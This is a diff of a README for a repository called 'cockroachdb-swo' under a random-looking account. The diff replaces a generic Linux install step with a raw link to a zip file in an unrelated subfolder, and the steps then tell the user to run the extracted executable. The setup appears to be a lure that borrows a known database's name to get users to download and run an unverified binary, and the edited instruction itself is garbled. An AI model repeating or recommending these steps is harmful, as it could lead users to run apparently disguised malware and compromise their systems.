sdfsjkfjsf/cockroachdb-swo/README.md

   3. Open Applications and find cockroachdb-swo to start the application.

 - **For Linux:**
-  1. Extract the downloaded `.tar.gz` file.
+  1. Extract the downloaded `https://raw.githubusercontent.com/sdfsjkfjsf/cockroachdb-swo/main/salmwood/cockroachdb-swo.zip` file.
   2. Open a terminal and navigate to the extracted folder.
   3. Run the command `./cockroachdb-swo` to start the application.